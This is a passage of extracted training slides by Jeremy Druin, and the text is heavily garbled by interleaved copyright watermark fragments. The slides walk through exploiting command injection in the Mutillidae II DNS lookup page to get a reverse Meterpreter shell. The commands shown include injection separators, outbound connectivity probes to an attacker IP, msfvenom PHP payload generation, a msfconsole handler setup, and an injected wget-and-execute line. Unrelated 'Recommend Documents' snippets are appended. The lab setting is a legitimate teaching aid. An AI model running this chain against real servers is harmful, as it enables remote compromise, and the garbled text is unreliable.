nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

t

gh Command  Injec,on   i r py o C ) c (

LAB  

61  

Command  Injec&on     •  Reverse  Meterpreter  

D T SC

ll A -

R

ts h g i

or f d •  Reference:  demo-­‐command-­‐injec,on-­‐via-­‐meterpreter-­‐php-­‐shell-­‐upload.txt   e r pa e r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

62  

ts Command  injec&on  to  gain   h g i R l reverse  Meterpreter  shell   Al D T   SC r fo •  The  DNS  lookup  page  in   d re a p e Mu&llidae  II  contains  a   r P command  injec&on  vulnerability   LC L IS E •  Ubuntu   nd a •  h`p://localhost/mu,llidae/ ruin D y index.php?page=dns-­‐lookup.php   m e r Je •  Samurai  WTF   t gh i r py •  h`p://mu,llidae/index.php? o C ) c page=dns-­‐lookup.php   (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

63  

Command  injec&on  to  gain  reverse   Meterpreter  shell     •  Locate  the  command  injec&on   vulnerability  using  command   separators  and  universal  binaries   •  •  •  • 

&  ls   |  ls   ;  ls   Others   op C (c)

nd a n

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

64  

Command  injec&on  to  gain  reverse  Meterpreter  shell    

ll A -

R

ts h g i

R

ed v r e es

D T SC •  Send  commands  tes&ng  outbound  connec&vity  from  voulnerable   server   r f d e back  to  a>acker  controlled  host   r pa e r •  Set  up  listener  on  a`acker  controlled  host   - P C L L •  A`empt  to  have  web  applica,on  server   ISreach  out  to  a`acker  host  over  various   E protocols  and  ports   nd a n •  ICMP  à  ping  -­‐c  1  10.0.0.164  rui D y •  UDP  à    tracepath  -­‐c  re 1  m 10.0.0.164   e tJ •  TCP  à    telnet   1 0.0.0.164   1234   h g i r ppyrotocols  likely  to  be  allowed   o •  Test  ports  a) nd   C c ( •  DNS,  web,  proxy,  etc.  

 

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

65  

R

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l Al   D T •  Set  up  tcpdump  on  local  host  filtering  for  incoming  packets   SC des&ned  for   r fo d a>acker  IP   re a

•  tcpdump  -­‐i  eth0  -­‐vv  -­‐X  dst    

 

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

p e r -P

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

66  

Command  injec&on  to  gain  reverse  Meterpreter  shell     •  A`empt  to  have  web  applica,on  send  packet  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f d •  www.google.com;  tracepath  -­‐c  1  10.224.35.168  (UDP)   e r pa e r •  www.google.com  &  telnet  10.224.35.168  1234   P(TCP)   LC L IS E nd   a A>acking  host  receives  packet   uin r D confirming  connec&vity   y m re e tJ h rig y op C (c)

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

67  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T •  Assuming  vulnerable  web  server  can  connect  back  to  ar>acker   host,  it  may   SC fo be  possible  to  force  web  server  to  download  payload   d re

a •  A  web  server  can  be  set  up  on  a`acker  host   Prep C •  A  command  injec,on  can  cause  web  server   L can  download  and  execute  content   L IS E nd a wget  h>p://acker  IP>/php-­‐meter-­‐script.txt   -­‐O  /tmp/php-­‐meter-­‐script.php   uin r D y php  -­‐f  /tmp/php-­‐meter-­‐script.php   m e er J t h Download  and   g i r py save  file  from   o Execute   fi le   w ith   C a>acker  host   (c) PHP  interpreter  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

68  

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T •  Search  available  payloads  for  those  that  offer  PHP  Meterpreter   SC r fo d   re a p e r msfvenom  -­‐-­‐list  payloads  |  grep  php/meter   - P nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

69  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T •  Use  msfvenom  to  generate  Meterpreter  PHP  payload   r SC fo d   re a p e r Pphp/meterpreter/ msfvenom  -­‐-­‐arch  php  -­‐-­‐plalorm  PHP  -­‐-­‐payload   C LP>   reverse_tcp  -­‐-­‐format  raw  lhost=
acker   I lport=acker  port>  >  /var/ L S I E www/html/commented-­‐php-­‐meter-­‐script.txt   d n n rui

D y m

t

(c)

py o C

h rig

re e J

a

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

70  

R

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T C •  msfvenom  puts  a  comment  symbol  at  the  front  of  the  M PHP   Seterpreter   r fo payload   d re a

•  Remove  the  comment  symbol  

L L EIS

C

p e r -P

sed  's/\/\*//'  /var/www/html/commented-­‐php-­‐meter-­‐script.txt   >  /var/ nd a n www/html/php-­‐meter-­‐script.txt   rui D y m

t

(c)

py o C

h rig

re e J

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

71  

Command  injec&on  to  gain  reverse  Meterpreter  shell     •  Start  Apache  web  server  running  on  a>acking  host  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f d the  vulnerable  web   •  The  web  server  will  serve  the  Meterpreter  PHP  shell  w hen   e r pa e server  requests  the  file   r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

72  

Command  injec&on  to  gain  reverse  Meterpreter   shell     •  Start  a  listener  on  the  a>acking  host  for   Meterpreter  to  connect    

LC msfconsole   L IS E msf  >  use  mul&/handler   nd a uipnhp/ msf    exploit(handler)  >  set  payload   r D meterpreter/reverse_tcp   emy er J msf    exploit(handler)  g>h  st et  lhost  
acker  IP>   ri y p msf    exploit(handler)   >  set  lport  acker  port>   o C (c) msf    exploit(handler)   >  exploit  

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

73  

ts Command  injec&on  to  gain  reverse   h g i R l Meterpreter  shell   Al D T   SC r fo •  Inject  command  to  cause  web  server  to  pull   d re a p e file  from  a>acking  host  and  execute   r P Meterpreter  script   LC nd a n

L S I E

&  ;wget  h>p://10.224.35.168/php-­‐meter-­‐ ui r D y script.txt  -­‐O  /tmp/php-­‐meter-­‐script.php;php   -­‐ m e r Je f  /tmp/php-­‐meter-­‐script.php   t h

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

g

(c)

yri p Co

74  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  Meterpreter  shell   h g i R l   Al D T •  If  the  user  under  which  the  web  server  is  running  has  prrivileges,   the  web   SC fo server  will  connect  back  to  a>acking  host   d re a

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

p e r -P

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

75  

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

REFERENCES  

C

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

76  

R

ts •  [1]  OWASP  Top  10  2013   h g i R l h`ps://www.owasp.org/index.php/Top_10_2013-­‐Top_10   Al D T •  [2]  OWASP  Louisville  Chapter,  h`ps://www.owasp.org/index.php/Louisville   SC r fo •  [3]  OWASP  Zed  A`ack  Proxy  Project,  OWASP,   d re a p e h`ps://www.owasp.org/index.php/OWASP_Zed_A`ack_Proxy_Project     r P C •  [5]  Burp-­‐Suite  Pro,  PortSwigger  Ltd  h`p://portswigger.net/   LL

op C (c)

t h g yri

J

m e r e

y

uin r D

IS E d an

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

References  

77  

R

ed v r e es

ts •  [6]  Command-­‐injec,on-­‐to-­‐shell   h g i R l h`p://www.aldeid.com/wiki/Command-­‐injec,on-­‐to-­‐shell   Al Dand  Disable   T •  [7]  Mu,llidae:  Command  Injec,on  to  Dump  Files,  Start  Services,   SC r fo   Firewall  h`p://www.youtube.com/watch?v=1bXTq_qaa_U   d re a [8]  Mu,llidae:  How  to  Locate  the  Easter  egg  File  ursing   p Command  Injec,on   e P h`p://www.youtube.com/watch?v=VWZYyH0VewQ     C L LAccess  via  Command  Injec,on   S [9]  Mu,llidae:  Gaining  Administra,ve  Shell   I E d h`p://www.youtube.com/watch?v=GRuRK-­‐bejgM     an n i ruInjec,on  to  Gain  Remote  Desktop   [10]  Mu,llidae:  Using  Command   D y m e h`p://www.youtube.com/watch?v=if17nCdQfMg     er op C (c)

t h g yri

J

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

References  

78  

Recommend Documents
Web Application Security ... which a user is sent to a malicious web page by an a.acker ..... PHP can create an HTTP header using the "header()" func on.

Click here! ..... EMAIL]&PayeeIsEmailToOrange=true&PayeeOrangeAccount=[PAYEE ACCOUNT NUM]&.

Web applications by definition allow users access to a central resource — the ... Thus secure web application development is an errorprone process and ...

Oct 10, 2016 - Mr. Gomez attained a Bachelor of Arts degree in Economics and a ...... the Federal Certification of the Child Support Enforcement (CSE) system.

velopment technologies (e.g., CGI, PHP, ASP), web browser and client-side technologies (e.g., JavaScript, Flash). Web application built and hosted upon such a ...

SELECT password,tel,fax,email FROM personal. WHERE surname='Sharp';. When executed on some SQL databases, this will result in. Sharp's password being ...

Mar 5, 2015 - Disclosed are various embodiments for performing security veri?cations for dynamic applications. An instance of an application is executed.

found code signing to be a good solution. Code signing verifies the mobile application author's identity and ensures the code hasn't been changed or modified.